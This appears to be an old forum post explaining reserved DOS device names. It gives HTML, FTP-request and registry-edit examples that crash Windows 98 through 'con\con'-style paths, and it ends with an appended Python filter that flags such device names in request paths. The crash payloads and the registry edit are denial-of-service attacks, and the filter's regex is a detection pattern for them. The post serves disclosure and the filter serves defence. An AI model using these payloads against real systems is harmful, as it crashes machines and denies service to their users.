posted 19 years ago
NUL, AUX, CON, COM1-4, LPT1-3, and PRN
are reserved words used for DOS devices.
These are specified in IO.SYS and date back to the early MS-DOS days. Here is a brief list:
CLOCK$ - System clock
CON - Console; combination of keyboard and screen to handle input and output
AUX or COM1 - First serial communication port
COMn - Second, third, ... communication port
LPT1 or PRN - First parallel port
NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null.
CONFIG$ - Unknown
Besides,
1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2 - Netscape Messenger appears to be invulnerable to this exploit).
Example:
<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.
3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value:
c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.
4. Creating an HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.
Example:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
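A server-side check for the device names listed in the post, as an added example that is not part of the original post: it flags any path component that resolves to a DOS device before a file server or mail filter hands the path to the operating system. The function names are hypothetical, and the handling of extensions, trailing dots, spaces and colons, plus COM/LPT numbers up to 9, goes beyond the list given above.

```python
import re

# Device names from the post; COM and LPT are widened to 1-9 here
# (assumption beyond the post, which lists COM1-4 and LPT1-3).
_DEVICE = re.compile(
    r"^(CON|PRN|AUX|NUL|CLOCK\$|CONFIG\$|COM[1-9]|LPT[1-9])$", re.IGNORECASE
)


def device_components(path):
    """Return the components of `path` that resolve to a DOS device name."""
    hits = []
    for part in re.split(r"[\\/]+", path):
        # Drop a drive prefix such as "c:" so "c:con" is checked as "con".
        name = re.sub(r"^[A-Za-z]:", "", part.strip())
        # DOS name matching ignores trailing dots and spaces, a trailing
        # colon and any extension: "nul.txt", "CON:" and "aux ." are devices.
        name = name.rstrip(". ").rstrip(":")
        name = name.split(".", 1)[0].rstrip(" ")
        if _DEVICE.match(name):
            hits.append(part)
    return hits


def is_safe_request_path(path):
    """True when no component of the path names a reserved device."""
    return not device_components(path)


if __name__ == "__main__":
    # Constructed sample request paths, not taken from any real log.
    samples = [
        "/con/con",
        "c:\\nul\\nul",
        "/pub/NUL.txt",
        "images/Clock$/x.gif",
        "/docs/console/notes.txt",
        "/pub/readme.txt",
    ]
    for p in samples:
        verdict = "ok" if is_safe_request_path(p) else "REJECT"
        print(f"{verdict:6} {p!r} {device_components(p)}")
```

Matching is per component and case-insensitive, so ordinary names that merely contain a device name, such as "console", pass.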